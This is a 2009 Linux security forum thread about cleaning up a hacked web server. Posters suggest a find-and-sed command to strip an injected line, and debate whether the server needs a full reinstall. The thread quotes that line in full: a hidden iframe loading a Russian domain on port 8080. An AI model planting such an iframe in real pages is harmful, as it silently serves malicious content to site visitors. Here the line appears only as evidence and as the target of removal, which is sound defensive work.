LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 07-14-2009, 08:44 AM   #1
Farman
LQ Newbie
 
Registered: Jul 2009
Posts: 3

Rep: Reputation: 0
A virus changed all my index files with iframe, how to remove that iframe line?


Hi there,

I've a dedicated server and don't know too much about Linux, but trying to manage it by learning slowly by looking at the tutorials etc.

I've several sites at my server, Today when I open my site I got an error message:
Code:
Parse error: syntax error, unexpected $end in /home/stuffloa/public_html/index.php on line 585
When I open the index.php file, I got this at line 585:
Code:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Now I want to remove this code from the entire server, it's infecting the pages which has <body> or named index.php, index.html etc.

Now It's impossible for me to check one by one file and remove this line manually. Is there any solution for removing this line at once?

And how can I prevent this from happening again?



Regards,
 
Old 07-14-2009, 08:52 AM   #2
colucix
Moderator
 
Registered: Sep 2003
Location: Bologna
Distribution: CentOS 6.5 OpenSuSE 12.3
Posts: 10,509

Rep: Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957
You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example
Code:
find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely is not needed in this case.
 
Old 07-14-2009, 09:16 AM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,541
Blog Entries: 54

Rep: Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924
...also note you can use another separator (pipe symbol?) to avoid having to escape chars in use. Prevention partially depends on the security posture of the machine: exposing services to world that should not be, misconfiguring software, running stale, vulnerable software versions and anything that basically is crappy coded doesn't help.
 
Old 07-14-2009, 09:19 AM   #4
tredegar
LQ 5k Club
 
Registered: May 2003
Location: London, UK
Distribution: Debian "Jessie"
Posts: 6,033

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.
 
Old 07-14-2009, 09:56 AM   #5
Farman
LQ Newbie
 
Registered: Jul 2009
Posts: 3

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by colucix View Post
You can use find to look for files based on their name and pass the filename to a sed command through xargs. For example
Code:
find /source/path -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
Substitute /source/path with the path of the directory from which you want to begin the search and the trick is done. Note that -print0 and -0 are options to manage file names with spaces, but most likely is not needed in this case.
Thanks all of you,

When I try to run this command as a root in ssh,
Code:
find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
i get nothing, "stuffloa" is my site which is in /home.

Where can be the problem?

Quote:
Originally Posted by tredegar View Post
If somebody is changing your code, it means your machine is compromised.

Editing bad code out of your php files is not going to help you. They'll just change it back.

You need to take the machine offline NOW (as it is probably sending spam, or worse) and raise this in the security forum of LQ where better people than I can give you the help you need to find out how they got past your security, and how to reinstall and harden your system.

I've asked for this thread to be moved.
About 8 hours before my server attacked, I removed the line from several files at that time, till now it is ok, i mean it's not changed back to viral infected, So I will tight the security later, but for now I should clean all the infected files.

So which command should I use to remove the entire line from all of the files?

If more information needed about my server or paths, I can provide.


Thank you

Last edited by Farman; 07-14-2009 at 10:01 AM.
 
Old 07-14-2009, 10:22 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,541
Blog Entries: 54

Rep: Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924
Quote:
Originally Posted by Farman View Post
When I try to run this command as a root in ssh
Does that mean you logged in over SSH as root account user?


Quote:
Originally Posted by Farman View Post
About 8 hours before my server attacked, I removed the line from several files at that time, till now it is ok, i mean it's not changed back to viral infected, So I will tight the security later, but for now I should clean all the infected files.
No, it's not a choice you make. You have to (and can) do both simultaneously.
 
Old 07-14-2009, 10:40 AM   #7
colucix
Moderator
 
Registered: Sep 2003
Location: Bologna
Distribution: CentOS 6.5 OpenSuSE 12.3
Posts: 10,509

Rep: Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957Reputation: 1957
Quote:
Originally Posted by Farman View Post
Code:
find /home/stuffloa -name index\* -print0 | xargs -0 sed -i '/<iframe src="http:\/\/a5j.ru:8080\/ts\/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"><\/iframe>/d'
i get nothing, "stuffloa" is my site which is in /home.

Where can be the problem?
Apart the security concerns that I leave to unSpawn and other members more expert than me... what do you mean for "I get nothing"? That command should not give any standard output, just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some test: copy one of the files containing that line in a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.
 
Old 07-14-2009, 11:18 AM   #8
Farman
LQ Newbie
 
Registered: Jul 2009
Posts: 3

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by colucix View Post
Apart the security concerns that I leave to unSpawn and other members more expert than me... what do you mean for "I get nothing"? That command should not give any standard output, just removes the line from the index* files. Note the -i option of the sed command: it means "edit the file in place".

Before actually running a command suggested by someone, do some test: copy one of the files containing that line in a dummy directory and test the command to see if it works. Once you've verified that it is free from bugs/errors and it does what you expect, you can safely run it on the true files.
Thanks all once again for your kindness.

Oh I'm so sorry Colucix, I checked it and worked perfectly.

Now the question is How Can We Prevent this type of Attack?
 
Old 07-14-2009, 11:38 AM   #9
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,541
Blog Entries: 54

Rep: Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924
It would be advisable for the OP to read this threads posts a little bit better.

Last edited by unSpawn; 07-14-2009 at 03:33 PM. Reason: //better
 
Old 07-16-2009, 09:04 AM   #10
r0b0
Member
 
Registered: Aug 2004
Location: Europe
Posts: 602

Rep: Reputation: 49
Farman - STOP doing what you are doing RIGHT NOW.

Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.

Robert
 
Old 07-16-2009, 09:40 AM   #11
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,541
Blog Entries: 54

Rep: Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924Reputation: 2924
Quote:
Originally Posted by r0b0 View Post
Farman - STOP doing what you are doing RIGHT NOW.
Nice. Usually it's me saying that sort of thing and phrasing it like that. However...


Quote:
Originally Posted by r0b0 View Post
Your machine is now operated by someone else, not you. You should stop worrying about some string replacement scripts. You need to REINSTALL your server from trusted sources (CD burned on another machine) and set it up securely BEFORE RUNNING INTERNET SERVICES ON IT.
Could it be you're mistaking a compromise of the root account with malarky on the service level? (Not that that is innocent if left as is.) In the Linux Security forum we deal with facts, so if you think a compromise of the root account has happened, wouldn't it be appropriate to ask the OP to collect data that supports your idea before telling him to wipe his machine? And even if there was a root account compromise, wouldn't he be heading for the same situation if he didn't know the intrusion vector?
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
iframe attack on my host Bono Linux - Security 7 08-11-2009 02:46 AM
force iframe content to remain in iframe? frieza Programming 1 09-17-2008 07:29 AM
Problem with iframe in Mozilla and Firefox ! Balakrishnan84 Programming 4 08-06-2007 12:22 AM
iframe woes ScottReed Programming 0 07-26-2007 12:04 PM
javascript - submit an iframe form AM1SHFURN1TURE Programming 1 09-23-2006 06:51 PM


All times are GMT -5. The time now is 12:58 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration